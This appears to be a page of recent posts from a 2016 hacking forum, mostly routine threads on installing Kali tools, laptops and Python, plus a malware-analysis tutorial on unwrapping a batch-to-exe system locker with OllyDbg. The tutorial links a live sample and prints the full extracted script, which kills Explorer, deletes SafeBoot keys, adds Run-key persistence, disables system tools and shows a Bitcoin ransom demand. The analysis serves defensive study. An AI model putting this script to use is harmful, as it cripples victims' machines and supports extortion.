Recent Posts

Pages: 1 ... 6 7 [8] 9 10
71
Tutorials / Re: How to install kali tool into debian distro
« Last post by dudiehack on February 05, 2016, 02:33:41 pm »
you wrote a tutorial showing us how to install a package in linux?

No, I wrote a tutorial for the newbies that want to install some tools from kali in debian-based distros. I don't see any problem... chill, it isn't for PRO people :)You have many paths to get Rome :)
72
Tutorials / Re: How to install kali tool into debian distro
« Last post by deltonos on February 05, 2016, 02:24:46 pm »
Its more "simple". In my VPS, I had installed Debian, updated & upgraded. After that, changed it to sources from kali. Again apt-get update&& upgrade and done... simple way and no extra python script :P
73
Tutorials / Re: How to install kali tool into debian distro
« Last post by 0pt1musPr1m3 on February 05, 2016, 02:20:36 pm »
you wrote a tutorial showing us how to install a package in linux?
74
Tutorials / How to install kali tool into debian distro
« Last post by dudiehack on February 05, 2016, 02:16:02 pm »
Installing Katoolin
Katoolin is an auto installer in python.

To install Katoolin run the following commands.

Code: Javascript
  1. # apt-get install git
  2. # git clone https://github.com/LionSec/katoolin.git  && cp katoolin/katoolin.py /usr/bin/katoolin
  3.  
  4.  

Then make /usr/bin/katoolin executable by running the command below.

Code: Javascript
  1. # chmod +x  /usr/bin/katoolin


Now you can run Katoolin as follows.

Code: Javascript
  1. # katoolin

And have fun

source : http://www.tecmint.com/install-kali-linux-tools-using-katoolin-on-ubuntu-debian/


75
Hardware / Re: Advice on laptop solely linux
« Last post by xKiller on February 05, 2016, 02:15:23 pm »
My brother has a Lenovo and he is very happy. His Lenovo has 6 gb ram the graphics card is dedicated
76
Unwrapping Exe Converters

Sample

Please download the following sample.

Win32.b1t.zip

Caution! This is live malware!

The password is "infected" without quotes.

Introduction to Wrappers

This tutorial will show you how to unwrap a wrapped file using OllyDbg. Wrapped files have a script or executable in their body, which they drop and run upon execution. Typically wrappers create exe files from, e.g., batch scripts, python scripts, jar files, autoit scripts. They are a very mild form of obfuscation, because the script or executable to be wrapped is most of the time encoded or encrypted within the resulting file.

Wrapped files often use the TEMP folder to drop the file, execute the dropped file, then delete it. The biggest difficulty is that the dropped file gets usually deleted before you can copy it. Simple forms of circumventing this situation are mentioned below. In this case we will use OllyDbg to obtain the dropped file.

Method 1: Change the folder permissions

  • Right-Click the folder, click on Properties
  • Click on the Security tab
  • If the Security tab is not there, you need to go to the folder options and uncheck Use simple file sharing
  • In the Security tab click Add..
  • Enter Everyone into the object name box, click OK
  • Click on Advanced. Select Everyone, then click on the Edit button
  • Place a checkmark in the deny column for delete and delete subfolders and files.
  • Click OK until all Windows are closed.
Note: Sometimes this will not work, because wrappers may create a temp file to unpack it, then delete the temp file and create a folder of the same name.

Method 2: Use a file copy script

Save the following batch file, replace the filename with the actual name of the temp file, and run the script prior to executing the sample. This will only work if you know the name of the temp file beforehand. If the sample creates a random name, you need to use another method to obtain the file.

Code: Text
  1. @echo off
  2. :loop
  3. copy %TEMP%\<filename> .
  4. goto loop

Method 3: Use a debugger

With a debugger like OllyDbg, break at a point were all files have been created but not yet deleted and copy them.

Analysis

Take a look at the executable with a hex editor first. Two things might tell you that this is wrapped file.

1. Antivirus detections contain BAT as platform.
2. Plaintext in the executable hints to the use of a b2e (batch to exe) converter.

That plaintext part looks as follows:

Code: [Select]
Overwrite? An unknown error occured. The program will be terminated. \ B D F I b2eincfilepath N O P S X open b2eargs Continue? extd b2etempfile b2eincfile @shift /0 Password Choose a location to save the files. -b2epass b2eprogramshortname Please enter the password. Error! b2eincfilecount The file 
 This program is not supported on your operating system. b2eprogramfilename Can not create some of your include files. b2eprogramname @call:extd Can not allocate the memory. OK b2eprogrampathname b2eextd Wrong password. extd.exe

   already exists in the current directory. Overwrite?              :extd
   @set result=
   @%b2eextd% "%~1" "%~2" "%~3" "%~4" "%~5" "%~6" "%~7" "%~8" "%~9" > "%b2etempfile%"
   @set /p result= < "%b2etempfile%"
   @del "%b2etempfile%"
   @goto:eof

Although this is some batch code, it is not the batch script that we want.

It is time to run the sample in your lab. You will realize soon that the Windows explorer disappears, the desktop is not functional anymore, and any attempts to open taskmanager or the command prompt will fail.



If you restart the machine, you will have the same situation after logging in. This would be typical behaviour for a system locker, but there is no ransom message. It also makes attempts to obtain the batch script more difficult. If you have ProcessExplorer still open, you will be able to kill the process that terminates the explorer. You will also be able to observe that a batch file was created in a randomly named subfolder in TEMP. But the batch file is soon gone after execution.

Unwrapping

Now start on a fresh VM and open the sample in OllyDgb. Create a snapshot before you start debugging. Olly wilt break as usual at the entry point of the executable.



Now think about it: What does the sample do before it runs the batch file?
It will write the file to TEMP. So we can set a breakpoint on WriteFile to halt before the TEMP file is written. Do that and press F9 to proceed with execution.

OllyDbg will break in this area within kernel32



Take a look at the registers. You can clearly see that a reference to the batch string is in the EDX register.



Right-click on the address and follow in dump.



The batch string will appear in the dump window and it seems to be complete.



This is a good point in time to create a dump of the process. I used ProcessExplorer in this case.



Now open the dumped memory in a hex editor and search for the beginning of the batch file, e.g., I searched for echo off in ASCII.



Copy and paste the batch file string to a new file. Et voila, you got the complete batch script! The most interesting part comes now. Open the script in a text editor like Notepad++ and analyse the code.

Code: Text
  1. @shift /0
  2. @echo off
  3. color c
  4. taskkill /im explorer.exe /f > nul
  5. Reg Delete HKLM\System\CurrentControlSet\Control\SafeBoot /f > nul
  6. copy %0 C:\Windows\Win32.bat > nul
  7. reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Win32 /t REG_SZ /d C:\Windows\Win32.bat /f
  8. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f > nul
  9. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul
  10. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD/t REG_DWORD/d 2 /f > nul
  11. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul
  12. reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer/v NoControlPanel /t REG_DWORD /d 1 /f >nul
  13. cls
  14. title Windows blocked, file encrypt
  15. echo Windows Blocked!
  16. echo Hello, we inform you that your system
  17. has been blocked and all the files are
  18. encrypted for viewing child porn.
  19. You can unlock the system,
  20. for this you need to pay 0.5 BTC 1G2GAivmaBkTephZsorQsyGFNNdBs3bWMB
  21. in the wallet Bitcoin application is written in your email address to which you will
  22. be sent the code to unlock it.
  23. echo Enter C0d3:
  24. :upo
  25. set /p x=
  26. if %x%==123456789 (echo Windows start!
  27. start explorer
  28. reg Delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f > nul
  29. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f > nul
  30. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f >nul
  31. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD/t REG_DWORD/d 0 /f > nul
  32. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 0 /f >nul
  33. reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer/v NoControlPanel /t REG_DWORD /d 0 /f >nul
  34. exit
  35. ) ELSE (
  36. cls
  37. echo ERROR!
  38. echo Enter C0d3:
  39. )
  40. goto upo
  41.  

This looks like a complete fail, doesn't it?
It is indeed a system locker ransomware, but there will never be a ransom note, because the command prompt is disabled and the ransom message is only shown in the command prompt!

Your task: Imagine a friend of yours got his or her system infected by this system locker. How would you be able to restore the system?
77
Hardware / Re: Advice on laptop solely linux
« Last post by dimi on February 05, 2016, 07:12:35 am »
Thank you for the input guys. I was also leaning forward to lenovo. The x201 has a similar size as the hp i currently own.

I think i'll go for the t. Now have to decide which one. Apparently the ts has some heating issues due to its smaller size.

I will upgrade it to 8gb. The upgrade is not so expensive.

Thank you for the advice!
78
Hacking and Security / Re: Cyber Security
« Last post by mmhackz on February 05, 2016, 06:51:22 am »
WTF!!!why i m gonna do the advertisement. I just found something useful, thats why i have shared the file...If you are interested download it, and not then dont downnload it.
79
General discussion / Re: Where are you from?
« Last post by z!3db on February 05, 2016, 04:11:47 am »
I'm from Tunisia

Sent from my SM-G355H using Tapatalk

80
Scripting Languages / Re: Python Projects
« Last post by TheCrazyPasta on February 05, 2016, 02:01:23 am »
Not sure how much your knowledge extends with python. I found the book "Learn python the hard way" I great tool ... every page is an exercise and gets you thinking. I wrote some simple things off ideas from the exercises . Good Luck
Pages: 1 ... 6 7 [8] 9 10


Intern0t SoldierX SecurityOverride programisiai
Want to be here? Contact Ande, Factionwars or Kulverstukas on the forum or at IRC.